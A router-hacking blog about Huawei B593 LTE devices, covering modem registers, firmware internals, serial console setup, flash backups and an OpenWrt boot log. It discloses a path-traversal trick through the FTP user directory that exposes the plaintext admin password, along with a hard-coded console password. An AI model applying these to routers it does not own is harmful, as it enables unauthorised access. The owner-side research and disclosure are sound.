The latest modem.bin firmwares currently available are the T-Mobile customized 11.533.03.03.748 (2013-09-30) from SP105 and the generic 11.433.61.00.00 (2012-12-04) from Polkomtel SP103. While these are customized for the EM920u, according to a few forum posts I've found they work equally well with Huawei USB LTE dongles such as the E392, part of the same MDM9200 family.

The Polkomtel one is generic, as there's no operator ID at the end of the firmware version. This means T-Mobile has requested some sort of LTE modem firmware customization from Huawei. I haven't noticed any difference in functionality myself, but depending on your operator there might be some.

You can check the version after opening an SSH connection to the router using the "lteat" command.

# lteat
AT>at^rdcust=?

Vodafone B2000 branded Huawei B593u-12 running T-Mobile SP105 with T-Mobile modem.bin (11.533.03.03.748 / 2013-09-30)
   (0: 1)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0)
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0) 
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1) 
(25: 0 0) (26: 0) (27: 1) (28: 1 1) (29: 1) 


Vodafone B2000 branded Huawei B593u-12 running Polkomtel SP103 with generic modem.bin (11.433.61.00.00 / 2012-12-04)
   (0: 0)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0) 
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0) 
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1) 
(25: 0 0) (26: 0) (27: 0) (28: 1 1) (29: 1) 

Did you spot it? #27 is different. Not that I have much idea what that means or whether it matters. A quick web search says it doesn't matter as long as the SIM card used works with the modem firmware, so it's not like some frequency would be disabled or other nasties.

This forum post provides a bit more information on these registers, but not much about #27, which we're most interested in.

0       Replace Firmware Version                True
1       ?Forbid 2G registration                 False
2       Forbid AT^CURC type/port                False
3       Change Mean TPT Size                    False
4       Change MTU size                         False
5       Replace Product ID (PID)                False
6       Change APN values                       False
7       Disable Video Calls                     False
8       Change USSD Mode                        False
9       Change? Full Frequency Scan             False
10      ?       LED Light                       False
11      Exclusive Cardlock                      False
12      Huawei Special SIM lock                 True
13      Permanent Cardlock                      False
14      Class-0 SMS Route                       False
15      Roaming HPLMN (count?)                  False
16      Diasble RPLMN (PME?)                    False
17      Change GPRS Recent Activity Timer       False
18      Change Default Traffic Class            False
19      Change STK                              False
20      Huawei Manual 3G? band Search Order     False
21      Current ^SYSCFGEX Mode List             False
22      Get/Set Attach PDP Parameters           False
23      Disable F-DPCH (WCDMA)                  True
24      Huawei IPV4 and IPV6 Configuration      N/A
25*     ?       Modified UI Network PLMN        False
26      [1] GID1 Customer Forbid Band           False
27      [1] Start Telus GID1 check              True for T-Mobile, False for generic / Polkomtel
28*     Set HS-DSCH Physical Layer Category     True
29      [1] Set GID1 LTE Band Preference        True

*   Returns 2 digits on the E589u-12.
[1] GID1 = "Group Identifier Level 1", a type of SIM network lockout mechanism.
    The GID1 elementary files on the SIM are specified in GSM 11.11 (ETS 300 977).


Differences of Huawei B593u and B593s

I have a few B593u models; it's a pretty straightforward Broadcom BCM5358 based router running Linux. As usual, Huawei never published the GPL sources. The LTE modem side is simply a Qualcomm MDM9200 based Huawei USB dongle connected internally to the Broadcom SoC over USB.

Perhaps luckily I don't have any B593s models, since unpacking the firmware shows it is Huawei HiSilicon Hi6920 based (HiSilicon V7R1 paired with a Balong 710 baseband) and runs both VxWorks 6.8 and Android concurrently. The Huawei E5172 is probably closely related. From the Huawei code it looks like the VxWorks bits are very much baseband related, leaving the rest of the intelligence to the Android side.

In essence this is much closer to an Android mobile phone or tablet with wired ports than to a traditional broadband router. Perhaps one core runs Android while another runs VxWorks? There are even two different Linux kernels referenced. Are both used in addition to VxWorks? Hard to say from just the firmware image, as these things are filled with dead code paths and features that never get used.

Partitions present:
BootLoad, NvBackLTE, NvBackGU, BootRom, VxWorks, Logo, FastBoot, kernel, yaffs0 .. yaffs6 and cdromiso.

BootLoad:
Balong V7R1 MCore bootloader...
Compile date: May 14 2013
Compile time: 11:54:47
press space key to enter bootrom:
ERROR:too many fails ,VXWORKS region is damaged, switch to BOOTROM.
BOOTROM_V01.02 H6920CS_UDP

BootRom:
V700R001C50B180

VxWorks:
VXWORKS
V700R001C50B180
ARM RealView PBX-A9
HiLteFe(0,0) host:vxWorks h=192.168.255.2 e=192.168.255.1:ffffff00 u=anonymous pw= tn=targetname
H:/CPE/compile/21.180.15.00.00/PLT/DRV_CODE/COMM_CODE/bsp/common/BSP_GLOBAL.c
C:/WindRiver/vxworks-6.8/target/config/comps/src\usrMmuInit.c
PWRCTRL_E5172CheckBatteryVol
/yaffs0/isover.bin
/yaffs0/WebUIVer.bin
/yaffs0/update.log
/yaffs0/update/firmware1.7z
/yaffs0/update/firmware2.7z
/yaffs0/update/iso.7z
/yaffs0/update/web_ui.7z
/yaffs0/ZSP.bin
/yaffs0/Nvim/
/yaffs0/Nvim/NvimCtrl.bin
/yaffs0/Nvim/NvimAuth.bin
/yaffs0/NvimBackup
/yaffs0/NvimBackup/
/yaffs0/NvimBackup/NvimCtrl.bin
/yaffs0/Nvim/Nvim.bin
/yaffs5/firmware1.bin
/yaffs5/firmware2.bin
/yaffs5/iso.bin
/yaffs5/web_ui.bin
/yaffs2/userdata/update_info.bin
HPA_GUAdjustRFVoltage: HPA_ADJUST_RF_VOLTAGE_INCREASE 1 V = %d Error!!!
Start DCXO NV UPDATE!
/yaffs0/SystemCmd.cmf
OM_AutoConfig: The config file is not exsit!
OM_AutoConfig: The Msg Len is too big : %d!
Secure Storage Key
Debug port protect Secure Storage Key
Integrity Protection Key
/yaffs0/SC/Pers/CKFile.bin
/yaffs0/SC/Pers/DKFile.bin
/yaffs0/SC/Pers/AKFile.bin
/yaffs0/SC/Pers/PIFile.bin
/yaffs0/SC/Pers/CKSign.hash
/yaffs0/SC/Pers/DKSign.hash
/yaffs0/SC/Pers/AKSign.hash
/yaffs0/SC/Pers/PISign.hash
/yaffs0/SC/Apsec/SecureDataA.bin
/yaffs0/SC/Apsec/SecureDataC.bin
Secure Storage Key
AT Secure Storage Key
Secure AT Key
E:/l00227173_view_C50B170_PHONE_GUL_129/PS_CODE/LTE_CODE/PS/Src/Rrc/Main/Src/LRrcOmItf.c
RRC_OMITF_ProcMaxTxPowerReq:input ptr null! ulMsgId =, pMsg =
RRC_OMITF_ProcMaxTxPowerReq, MaxTxPower

ANDROID!|
root=/dev/ram0 rw console=ttyAMA0,115200 console=uw_tty0 rdinit=/init mem=144m
/home/zqc/src/43236/custom/huawei/4.5.1/bin/../lib/gcc/arm-none-linux-gnueabi/4.5.1/include
/home/zqc/src/43236/173/src/shared/bcmwifi/include
/opt/CodeSourcery/Sourcery_G++_Lite/bin/../lib/gcc/arm-none-linux-gnueabi/4.5.2/include
Linux MBB-V7R1-CPE 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:09:38 UTC 2010 x86_64 GNU/Linux

root=/dev/ram0 rw console=ttyAMA0,115200 rdinit=/linuxrc mem=28M
Linux version 2.6.35.7 (q81003564@MBB-V7R1-CPE) (gcc version 4.5.1 (ctng-1.8.1-FA) ) #1 PREEMPT Tue May 14 11:52:35 CST 2013
balong_tft_init
balong_tft_store
balong_tft_ioctl
DMS_OpenHsicPort
MPWUDP
E392s
CH1E392DM
B710S0
E392
E3276s-150
CH1E3276SM
E3276
E5776s
CL1E5776SF
B710D0
102HW
E5776s-860
CL3E5776SM
E5776s-71
CL1E5776SS
GL04P
B593s-22
CL1E5172M
B710C0
E5172s-920
E5172
B593s-601
E5172s-515
B593s-12
PV500
PORTING
B593s-850
/home/q81003564/q81003564/hi6920cs_b593s_22/PS_CODE/Build_LTE/APP_CORE/../../../PS_CODE/COMM_CODE/NDIS/Src/PsNdis.c

# ADDITIONAL_DEFAULT_PROPERTIES
ro.secure=0
ro.allow.mock.location=1
ro.debuggable=1
persist.service.adb.enable=1
init.goldfish.rc
on boot
    setprop ARGH ARGH
    setprop net.eth0.dns1 10.0.2.3
    setprop net.gprs.local-ip 10.0.2.15
    setprop ro.radio.use-ppp no
    setprop ro.build.product generic
    setprop ro.product.device generic# mount mtd partitions
# Mount /system rw first to give the filesystem a chance to save a checkpoint
    mount yaffs2 mtd@/yaffs2 /data
    mount yaffs2 mtd@/yaffs1 /system
    mount yaffs2 mtd@/yaffs1 /system ro remount
    mount yaffs2 mtd@/yaffs3 /app
#    mount yaffs2 mtd@/yaffs5 /online
    mount yaffs2 mtd@/yaffs4 /cpedata
        mount yaffs2 mtd@/yaffs4 /cpedata ro remount
#    mount yaffs2 mtd@/yaffs2 /data nosuid nodev
#    mount yaffs2 mtd@cache /cache nosuid nodev
    mkdir /data/userdata
    mkdir /data/equipdata
#service insmodko /etc/insmodko.sh
#    oneshot
#service autorun /etc/autorun.sh
#    oneshot
on post-fs
    # once everything is setup, no need to modify /
    mount rootfs rootfs / rw remount
    # We chown/chmod /data again so because mount is run as root + defaults
    chown system system /data
    chmod 0771 /data
    chmod 0771 /app
    chmod 0777 /data/userdata
    chmod 0777 /data/equipdata
service balonginit /bin/balonginit  

CANNOT READ BOOT IMAGE HEADER
ANDROID!
INVALID BOOT IMAGE HEADER
start flash read kernel image(offset:0x%x len:0x%x)
CANNOT READ KERNEL IMAGE
finish flash read kernel image(skip_len=0x%x)
start flash read ramdisk image(offset:0x%x len:0x%x)
CANNOT READ RAMDISK IMAGE
finish flash read ramdisk image(skip_len=0x%x)
start wait c core...
finish waiting...
kernel  @ %x (%d bytes)
ramdisk @ %x (%d bytes)
mem=50M console=null
cmdline = '%s'
Booting Linux
BalongV7R1 ASIC ACore fastboot...
 ** BOOTING LINUX FROM FLASH **
 hdr is NULL
 Bootimg magic is '%s'

HUAWEI_VERSION=B593s-22
HUAWEI_RELEASE=ATP
ATP_PLT_VERSION=V100R003C05B001
HUAWEI_EXTRAVERSION=V200R001B180D15SP00C00
HUAWEI_INTRSWVERSION=V200R001B180D15SP00C00
HUAWEI_HWVERSION=Ver.B
#CFE
CFE_BASE_VERSION=V200R001B180D15SP00C00
#WEB
HUAWEI_EXTRAVERSION_WEB=V200R001B180D15SP00C00


How to capture LTE WAN traffic for diagnostic purposes on Huawei B593u and not so much of security

Found this document on Huawei webpage you might be interested. It's in Microsoft Word .docx format.

http://www.huawei.com/ecommunity/3msimage/download-10060827-10000297-9bca6ae8ffa54796a5245e6650b0e607.bin?type=bbs

Doc shows how to access Qualcomm diagnostic interface of EM920u module inside B593 using QXDM and QPST.

It also shows how to gain root access to device using something called "Huawei deviceLocker V0.1" diagnostics tool. Which I find worrying as there appears to be some magic-packet that can be sent to device to bypass protections. Document also has same hard coded admin password listed that I found out on my previous post.

There's also a mass firmware upgrade tool that will upgrade multiple devices at once. All B593s to be upgraded must be connected to the same isolated LAN; the PC client then sends the firmware to the devices using multicast. No authentication is required. Look for a document named "LTE CPE B593u Binary Upgrade Guide.doc" and the "B593_upgrade.exe" application.

For upgrades Huawei uses the multicast address 224.0.0.119, and the binary on the router side is /bin/multiupg.

Serial console on Huawei B593u

Here's the location of the Huawei B593u TTL serial console. Settings are the usual 115200 8N1.

If you're using a typical USB TTL serial adapter you only need RX, TX and GND. Make sure your pins are properly labeled; for example, my USD 0.99 (including shipping) CP210x adapter has its TX and RX labels reversed.


The tricky part comes after you have a known-good software and hardware setup. You will NOT see anything from the device when it boots, because Huawei has disabled the console in both the CFE bootloader and on the Linux side. Luckily there's a fix for that.


Method 1. This works even if you don't have root shell access to the device over SSH. It's also the risky way, so use method 2 whenever possible. Because there's inevitably some badass out there reading this, I'd better document this as well.

DO NOT CONTINUE WITHOUT WORKING SERIAL PORT. YOU WON'T GET BACK TO NORMAL MODE FROM RECOVERY MODE WITHOUT ONE!

Unplug any USB devices if connected. Press and hold all three buttons on the side (WLAN, RESET, WPS). Turn the power on. All LEDs turn on. Keep holding all three buttons. Release them when all LEDs except the power LED turn off.

Within a few seconds you'll see typical Linux boot messages scrolling on screen and the WPS LED starts flashing. If you don't see anything on screen but the WPS LED flashes, the device is in recovery mode (running B593-small.trx) but your serial port wiring or software setup is incorrect.

Anyway, now you're in a root shell. Next we want to enable the serial port in CFE as well. Simply type the following commands to change the NVRAM settings.

# Enable CFE and normal boot (B593.trx) serial console
nvram set console_disable=0

# Enable boot_wait with 10 second delay for more recovery options
nvram set boot_wait=on
nvram set wait_time=10

# Boot regular OS (B593.trx). Use boot_part=1 for recovery OS (B593-small.trx)
nvram set boot_part=0

# Write changes made to NVRAM
nvram commit

Now you can simply power cycle the device or reboot from the OS. On the next boot both the CFE and OS serial consoles are working.


Method 2. This is the way you should use. I've tested this with Polkomtel SP103 firmware, so upgrade/downgrade to SP103 in case you run into problems following the steps below. I didn't, and spent way too much time fixing the mess I ended up with after method 1. :)

Boot the device normally.
Plug in a FAT32 or NTFS formatted USB memory stick.
Log in to the management interface as admin.
Select USB Management > Server Settings in the left-hand panel.
Enable the FTP server and click Submit.
Select USB Management > User Settings.
Create a new user by clicking Add Items.
Type ../../../.. in the Directory field and enable Read-Write access.

Open an FTP connection to the device and download the /var/sshusers.cfg file.
Your SSH admin password is right there in plaintext: admin:PASSWORD:0. Ignore the second "user" line.

Open an SSH connection to the device and log in as "admin" with the password from sshusers.cfg.
Now you're in the "ATP" shell.
Type "shell" to open a BusyBox root shell.

Next we make a FULL backup of the system so we have something to recover the device with if we screw up. There's a 16MB SPI flash and a 256MB NAND USB flash on board. We'll back up both, so make sure your USB memory stick (which should still be plugged in) has around 300MB free.

For the SPI flash we'll use Huawei's "flashtest" binary. The folder where the USB memory stick is mounted varies; below it's usb1_1 but yours might be usb2_1. Check this first.

# flashtest info
 flash  block  size  :  0x40000 (256k Bytes)
  flash  block  num   :  0x40 (64 Blocks)
  flash  total  size  :  0x1000000 (16M Bytes)
  flash  partation  info : 
  --------------------------------------------------------------- 
  Name                  Address                    Usage 
 --------------------------------------------------------------- 
  Boot                  0x0---0x40000            Bootloader 
  Image             0x40000---0xA40000           Main  image 
  Image            0xA40000---0xE00000           Subject  image 
  Curcfg           0xE00000---0xE40000           Curcent  config 
  Faccfg           0xE40000---0xE80000           Factury  config 
  Tmpcfg           0xE80000---0xF00000           Temp  config 
  Fixcfg           0xF00000---0xF40000           Fixed  config 
  Logcfg           0xF40000---0xF80000           Log  config 
  TR069            0xF80000---0xFC0000           TR069  cert 
  Nvram            0xFC0000---0xFFFFFF           Nvram 

# Wholeflash
flashtest export 000000 16777216
mv /tmp/flashinfo.bin /mnt/usb1_1/0x000000-0xffffff.wholeflash

# Boot / Bootloader
flashtest export 000000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0x000000-0x040000.bootloader

# Image / Main  image
flashtest export 040000 10485760
mv /tmp/flashinfo.bin /mnt/usb1_1/0x040000-0xa40000.mainimage

# Image / Subject  image
flashtest export a40000 3932160
mv /tmp/flashinfo.bin /mnt/usb1_1/0xa40000-0xe00000.subjectimage

# Curcfg / Curcent  config
flashtest export e00000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xe00000-0xe40000.currentconfig

# Faccfg / Factury  config
flashtest export e40000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xe40000-0xe80000.factoryconfig

# Tmpcfg / Temp  config
flashtest export e80000 524288
mv /tmp/flashinfo.bin /mnt/usb1_1/0xe80000-0xf00000.tempconfig

# Fixcfg / Fixed  config
flashtest export f00000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xf00000-0xf40000.fixedconfig

# Logcfg / Log  config
flashtest export f40000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xf40000-0xf80000.logconfig

# TR069 / TR069  cert
flashtest export f80000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xf80000-0xfc0000.tr069cert

# Nvram / Nvram
flashtest export fc0000 262144
mv /tmp/flashinfo.bin /mnt/usb1_1/0xfc0000-0xffffff.nvram

Next we use dd to back up the NAND flash, which is simply an on-board USB memory stick. The stock OS calls it /dev/nandflash but it's also accessible as /dev/sda0.

# NAND flash backup
dd bs=4k if=/dev/nandflash of=/mnt/usb1_1/nandflash.bin

Now that we have a clean state backed up we can continue with the NVRAM change that enables the serial console.

# Enable CFE and normal boot (B593.trx) serial console
nvram set console_disable=0

# Enable boot_wait with 10 second delay for more recovery options
nvram set boot_wait=on
nvram set wait_time=10

# Boot regular OS (B593.trx). Use boot_part=1 for recovery OS (B593-small.trx)
nvram set boot_part=0

# Write changes made to NVRAM
nvram commit
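The whole of method 2 from the partition dump through the NVRAM change (the same four nvram settings method 1 uses), collected into one script as an added example. This is neither Huawei's code nor the post's own. It assumes the router's nvram tool supports `nvram get` for reading values back, and that its BusyBox provides wc, tr and printf. The embedded partition table is a copy of the flashtest output above so the parser can be checked off the device; the Nvram entry, which flashtest lists with an inclusive end of 0xFFFFFF, is rounded up to the 256 KiB erase block, matching the 262144 bytes the post exports for it.

```shell
#!/bin/sh
# Added example (not from the original post): back up every SPI-flash
# partition that `flashtest info` lists, plus the NAND image, then enable
# the serial console only after every value reads back correctly.
#
# Assumptions not confirmed by the post: `nvram get` exists on the router's
# nvram tool, and wc/tr/printf are present in its BusyBox.

BLOCK=262144                # 0x40000, erase block size reported by flashtest
DEST=${DEST:-/mnt/usb1_1}   # USB stick mount point; may be usb2_1 on your unit

# Constructed copy of the `flashtest info` partition table from the post,
# embedded so parse_partitions can be exercised without the hardware.
PARTITION_TABLE='
  Name                  Address                    Usage
  ---------------------------------------------------------------
  Boot                  0x0---0x40000            Bootloader
  Image             0x40000---0xA40000           Main  image
  Image            0xA40000---0xE00000           Subject  image
  Curcfg           0xE00000---0xE40000           Curcent  config
  Faccfg           0xE40000---0xE80000           Factury  config
  Tmpcfg           0xE80000---0xF00000           Temp  config
  Fixcfg           0xF00000---0xF40000           Fixed  config
  Logcfg           0xF40000---0xF80000           Log  config
  TR069            0xF80000---0xFC0000           TR069  cert
  Nvram            0xFC0000---0xFFFFFF           Nvram
'

# parse_partitions: print "label start_bytes length_bytes" per partition.
# Lengths are rounded up to the erase block, so the Nvram entry (inclusive
# end 0xFFFFFF) yields 262144 bytes instead of 262143.
parse_partitions() {
    printf '%s\n' "$PARTITION_TABLE" | while read -r name range usage rest; do
        case "$range" in
            0x*---0x*) ;;
            *) continue ;;
        esac
        start=$(( ${range%%---*} ))
        end=$(( ${range##*---} ))
        len=$(( (end - start + BLOCK - 1) / BLOCK * BLOCK ))
        label=$(printf '%s%s' "$usage" "$rest" | tr '[:upper:]' '[:lower:]' | tr -d ' ')
        printf '%s %d %d\n' "$label" "$start" "$len"
    done
}

# export_region OFFSET LENGTH FILE: run flashtest export as the post does,
# move the result, and fail unless the dump is exactly LENGTH bytes.
export_region() {
    off=$1; len=$2; out=$3
    flashtest export "$(printf '%06x' "$off")" "$len" || return 1
    mv /tmp/flashinfo.bin "$out" || return 1
    actual=$(wc -c < "$out" | tr -d ' ')
    if [ "$actual" -ne "$len" ]; then
        echo "size mismatch for $out: got $actual, expected $len" >&2
        return 1
    fi
}

# backup_all: whole SPI flash, each partition, then the NAND flash via dd.
backup_all() {
    export_region 0 16777216 "$DEST/0x000000-0xffffff.wholeflash" || return 1
    parse_partitions | while read -r label start len; do
        end=$(( start + len ))
        export_region "$start" "$len" \
            "$(printf '%s/0x%06x-0x%06x.%s' "$DEST" "$start" "$end" "$label")" || exit 1
    done || return 1
    dd bs=4k if=/dev/nandflash of="$DEST/nandflash.bin" || return 1
}

# enable_console: apply the NVRAM settings from the post, read each one
# back (assumes `nvram get`), and commit only if all of them match.
enable_console() {
    for kv in console_disable=0 boot_wait=on wait_time=10 boot_part=0; do
        nvram set "$kv" || return 1
    done
    for kv in console_disable=0 boot_wait=on wait_time=10 boot_part=0; do
        key=${kv%%=*}
        [ "$(nvram get "$key")" = "${kv#*=}" ] || { echo "nvram $key not set" >&2; return 1; }
    done
    nvram commit
}

# On the router, after confirming $DEST with `mount`, run:
# backup_all && enable_console
```

parse_partitions is the only part that runs off the device; backup_all and enable_console call flashtest, dd and nvram, so run them only from the BusyBox root shell with the stick mounted, and keep the dumps somewhere other than the router before touching NVRAM.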

And that's it.

P.S. The serial console login is "admin" with password "HW4GCPE". Internally /bin/console aka /bin/cli converts "admin" to "Happy" and "HW4GCPE" to "tonight" and then performs a strncmp. WTF?



What's inside Huawei B593u-12 LTE router?

There aren't many pictures showing the innards of the B593u around, and even fewer with any details. This obviously needs to be fixed.

Two screws on bottom.

Warranty void stickers cover them.

One screw on back between external antenna connectors.

Board front.
- Internal on-board LTE antennas at top left and top right
- External LTE antenna connectors at top left and top right
- The small black ICs next to the antenna connectors are GPIO-controlled RF switches that let software select between the internal and external antennas
- LTE module EM920u-12 in the center (socketed mini PCIe)
- SIM card socket on the middle left
- Power button on the left, under the SIM card socket
- Side USB port at bottom left
- Power input at bottom left
- Rear USB port to the right of it
- Two VoIP ports at bottom center, with their driver chips above them
- Four yellow Ethernet LAN ports at bottom right
- Ethernet magnetics between the LAN ports and the LTE module
- On-board WLAN antennas in the bottom right corner
- Three buttons on the lower right side; from bottom to top: WLAN, RESET and WPS
- To the left of the buttons are the Broadcom BCM5358 SoC, a Spansion 16MiB SPI flash and Hynix 128MB DRAM
- Above these is the 256MiB NAND flash, connected over an internal USB bus
- To the left of the NAND flash are two serial ports which DO NOT work despite the promising silkscreen labels
- Above the NAND flash is the JTAG port; I haven't tested it but all components appear to be there


Back of the board.
 - Serial console is on top left right below JTAG. Four solder tabs without thru board holes.


Link to full album.

Tuesday, August 12, 2014

Well, that was easy

I think the Ethernet switch and wireless aren't supported by open-source drivers, so even with OpenWrt booting on the Huawei B593u-12 it's not much use. The USB-connected LTE module is not detected; my guess is that some GPIO needs to be toggled to enable it. The PCA9555 GPIO expander would need some work too. Also the 256MB NAND flash is missing, only the 16MB SPI flash is found.

CFE version 5.60.120.9  based on BBP 1.0.37 for BCM947XX (32bit,SP,LE)
Build Date: Tue Mar 20 05:49:24 HKT 2012 (wzq@cpe)
Copyright (C) 2000-2008 Broadcom Corporation.

Init Arena
Init Devs.
Boot partition size = 262144(0x40000)
Sflash type : 0x100 ; Sflash devid : 0x17 ; Sflash manuid : 0x1
Found a 16MB SPANSION serial flash
pca9555 init data 0x00
Found pca9555
pca9555 0x02 hw_verion 0x01
et0: Broadcom BCM47XX 10/100/1000 Mbps Ethernet Controller 5.60.120.9 
CPU type 0x19749: 500MHz
Tot mem: 131072 KBytes

CFE mem:    0x80700000 - 0x8079CA90 (641680)
Data:       0x80732950 - 0x80735AB0 (12640)
BSS:        0x80735AB0 - 0x80736A90 (4064)
Heap:       0x80736A90 - 0x8079AA90 (409600)
Stack:      0x8079AA90 - 0x8079CA90 (8192)
Text:       0x80700000 - 0x80732950 (207184)

Device eth0:  hwaddr E8-CD-2D-72-15-CF, ipaddr 192.168.1.1, mask 255.255.255.0
        gateway not set, nameserver not set
gpio 26 value 0x1
gpio 25 value 0x1
cur_part is 0
product_name : B593-U12
plt_version : V100R003C03B008
sw_version : V100R001C00SP999
hw_version : Ver.B
modem_version : 11.999.00.00.00
Loader:raw Filesys:tftp Dev:eth0 File:: Options:(null)
Loading: Failed.
Could not load :: Timeout occured
boot_part now 0
Loader:raw Filesys:raw Dev:flash0.os File: Options:(null)
Loading: .. 3712 bytes read
Entry at 0x80001000
Closing network.
Starting program at 0x80001000
[    0.000000] Linux version 3.14.16 (bobbuilder@openb593) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r42110) ) #3 Tue Aug 12 01:25:33 EEST 2014
[    0.000000] CPU0 revision is: 00019749 (MIPS 74Kc)
[    0.000000] bcm47xx: using bcma bus
[    0.000000] bcma: bus0: Found chip with id 0x5357, rev 0x02 and package 0x09
[    0.000000] bcma: bus0: Core 0 found: ChipCommon (manuf 0x4BF, id 0x800, rev 0x26, class 0x0)
[    0.000000] bcma: bus0: Core 3 found: MIPS 74K (manuf 0x4A7, id 0x82C, rev 0x04, class 0x0)
[    0.000000] bcma: bus0: Found M25FL128 serial flash (size: 16384KiB, blocksize: 0x10000, blocks: 256)
[    0.000000] bcma: bus0: Early bus registered
[    0.000000] MIPS: machine is Unknown Board
[    0.000000] Determined physical RAM map:
[    0.000000]  memory: 07fff000 @ 00000000 (usable)
[    0.000000] Initrd not found or empty - disabling initrd
[    0.000000] Zone ranges:
[    0.000000]   Normal   [mem 0x00000000-0x07ffefff]
[    0.000000]   HighMem  empty
[    0.000000] Movable zone start for each node
[    0.000000] Early memory node ranges
[    0.000000]   node   0: [mem 0x00000000-0x07ffefff]
[    0.000000] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[    0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
[    0.000000] Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 32511
[    0.000000] Kernel command line:  noinitrd console=ttyS0,115200
[    0.000000] PID hash table entries: 512 (order: -1, 2048 bytes)
[    0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes)
[    0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes)
[    0.000000] Writing ErrCtl register=00000000
[    0.000000] Readback ErrCtl register=00000000
[    0.000000] Memory: 126468K/131068K available (2393K kernel code, 108K rwdata, 476K rodata, 144K init, 248K bss, 4600K reserved, 0K highmem)
[    0.000000] NR_IRQS:128
[    0.000000] Setting up vectored interrupts
[    0.060000] Calibrating delay loop... 249.44 BogoMIPS (lpj=1247232)
[    0.070000] pid_max: default: 32768 minimum: 301
[    0.070000] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[    0.070000] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[    0.070000] NET: Registered protocol family 16
[    0.090000] bio: create slab <bio-0> at 0
[    0.090000] Switched to clocksource MIPS
[    0.100000] NET: Registered protocol family 2
[    0.100000] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[    0.100000] TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
[    0.100000] TCP: Hash tables configured (established 1024 bind 1024)
[    0.100000] TCP: reno registered
[    0.100000] UDP hash table entries: 256 (order: 0, 4096 bytes)
[    0.100000] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[    0.100000] NET: Registered protocol family 1
[    0.100000] bcma: bus0: Core 1 found: IEEE 802.11 (manuf 0x4BF, id 0x812, rev 0x1C, class 0x0)
[    0.100000] bcma: bus0: Core 2 found: GBit MAC (manuf 0x4BF, id 0x82D, rev 0x03, class 0x0)
[    0.100000] bcma: bus0: Core 4 found: USB 2.0 Host (manuf 0x4BF, id 0x819, rev 0x05, class 0x0)
[    0.100000] bcma: bus0: Core 5 found: DDR1/DDR2 Memory Controller (manuf 0x4BF, id 0x82E, rev 0x02, class 0x0)
[    0.100000] bcma: bus0: Core 6 found: I2S (manuf 0x4BF, id 0x834, rev 0x02, class 0x0)
[    0.100000] bcma: bus0: Core 7 found: Internal Memory (manuf 0x4BF, id 0x80E, rev 0x0B, class 0x0)
[    0.110000] can not parse nvram name sb/1/rxpo2g(null) with value 0xff got -34
[    0.110000] can not parse nvram name sb/1/ag2(null) with value 0xff got -34
[    0.110000] can not parse nvram name sb/1/ag3(null) with value 0xff got -34
[    0.160000] bcma: bus0: Bus registered
[    0.160000] futex hash table entries: 256 (order: -1, 3072 bytes)
[    0.160000] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[    0.170000] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[    0.170000] msgmni has been set to 247
[    0.170000] io scheduler noop registered
[    0.170000] io scheduler deadline registered (default)
[    0.170000] Serial: 8250/16550 driver, 2 ports, IRQ sharing enabled
[    0.190000] serial8250.0: ttyS0 at MMIO 0xb8000300 (irq = 2, base_baud = 1250000) is a U6_16550A
[    0.580000] console [ttyS0] enabled
[    0.720000] 9 bcm47xxpart partitions found on MTD device bcm47xxsflash
[    0.720000] Creating 9 MTD partitions on "bcm47xxsflash":
[    0.730000] 0x000000000000-0x000000040000 : "boot"
[    0.740000] 0x000000040000-0x00000004001c : "firmware"
[    0.740000] 0x00000004001c-0x0000000409e0 : "loader"
[    0.750000] 0x0000000409e0-0x00000014c800 : "linux"
[    0.760000] mtd: partition "linux" must either start or end on erase block boundary or be smaller than an erase block -- forcing read-only
[    0.770000] 0x00000014c800-0x000000a40000 : "rootfs"
[    0.780000] mtd: partition "rootfs" must either start or end on erase block boundary or be smaller than an erase block -- forcing read-only
[    0.790000] mtd: device 4 (rootfs) set to be root filesystem
[    0.800000] mtd: partition "rootfs_data" created automatically, ofs=0x490000, len=0x5b0000
[    0.810000] 0x000000490000-0x000000a40000 : "rootfs_data"
[    0.820000] 0x000000a40000-0x000000ff0000 : "firmware"
[    0.820000] 0x000000a4011c-0x000000ba14e8 : "linux"
[    0.830000] mtd: partition "linux" must either start or end on erase block boundary or be smaller than an erase block -- forcing read-only
[    0.840000] 0x000000ba14e8-0x000000ff0000 : "rootfs"
[    0.850000] mtd: partition "rootfs" must either start or end on erase block boundary or be smaller than an erase block -- forcing read-only

[    0.870000] 0x000000ff0000-0x000001000000 : "nvram"
[    0.880000] bgmac bcma0:1: Found PHY addr: 30 (NOREGS)
[    0.890000] bgmac bcma0:1: Support for Roboswitch not implemented
[    0.900000] libphy: bgmac mii bus: probed
[    0.980000] b53_common: found switch: BCM5325, rev 4
[    0.990000] bgmac: Broadcom 47xx GBit MAC driver loaded
[    1.000000] bcm47xx-wdt bcm47xx-wdt.0: BCM47xx Watchdog Timer enabled (30 seconds)
[    1.010000] TCP: cubic registered
[    1.010000] NET: Registered protocol family 17
